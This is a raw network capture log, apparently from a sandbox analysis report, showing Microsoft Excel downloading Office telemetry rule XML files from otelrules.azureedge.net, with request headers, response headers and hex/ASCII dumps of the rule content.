                                                                                                        2024-12-09 12:50:03 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        76192.168.2.84980113.107.246.634436028C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:03 UTC207OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:03 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:03 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 2128
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                        ETag: "0x8DC582BA41F3C62"
                                                                                                        x-ms-request-id: cbf7858c-401e-008c-6a54-4986c2000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125003Z-r1cf579d7789jf56hC1EWRu58800000003d0000000007tbz
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:03 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        77192.168.2.84980213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:03 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:03 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:03 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 472
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                        x-ms-request-id: 1dbd65e4-a01e-0002-7203-485074000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125003Z-r1cf579d778qlpkrhC1EWRpfc8000000094g0000000024bf
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:03 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        78192.168.2.84980313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:03 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:03 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:03 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 405
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                        x-ms-request-id: d2f4848f-f01e-0099-6fbe-499171000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125003Z-r1cf579d7788c742hC1EWRr97n00000002p0000000001w3b
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:03 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        79192.168.2.84980413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:05 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:05 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:05 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 468
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                        x-ms-request-id: c868132e-401e-00ac-58ad-490a97000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125005Z-r1cf579d7782v2q5hC1EWRt9bw0000000300000000008wh7
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        80192.168.2.84980513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:05 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:05 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:05 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 174
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                        x-ms-request-id: 3d573422-e01e-0051-67ad-4984b2000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125005Z-r1cf579d778gg9hlhC1EWRh7nw00000000vg000000007x5a
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:05 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        81192.168.2.84980613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:05 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:06 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:05 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1952
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                        x-ms-request-id: fc76f525-701e-0021-0549-493d45000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125005Z-r1cf579d778469knhC1EWR2gqc000000016g000000002dgn
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:06 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        82192.168.2.84980713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:05 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:06 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:05 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 958
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                        x-ms-request-id: 0b61f7bb-f01e-0052-4103-489224000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125005Z-r1cf579d7788pwqzhC1EWRrpd800000008k0000000007ezw
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:06 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        83192.168.2.84980813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:07 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:07 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:07 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 501
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                        x-ms-request-id: f8b9edf2-d01e-002b-0fbc-4925fb000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125007Z-r1cf579d7788c742hC1EWRr97n00000002gg000000006ndp
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:07 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        84192.168.2.84980913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:07 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:07 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:07 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 2592
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                        x-ms-request-id: 5174d810-b01e-003d-4b9a-49d32c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125007Z-r1cf579d778j4j5fhC1EWR3ge800000001v0000000007nqc
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:07 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        85192.168.2.84981013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:07 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:08 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:08 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 3342
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                        x-ms-request-id: 1dbd6d1b-a01e-0002-3903-485074000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125008Z-r1cf579d7789trgthC1EWRkkfc000000091g000000005mkr
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:08 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        86192.168.2.84981113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:07 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:08 UTC494INHTTP/1.1 200 OK
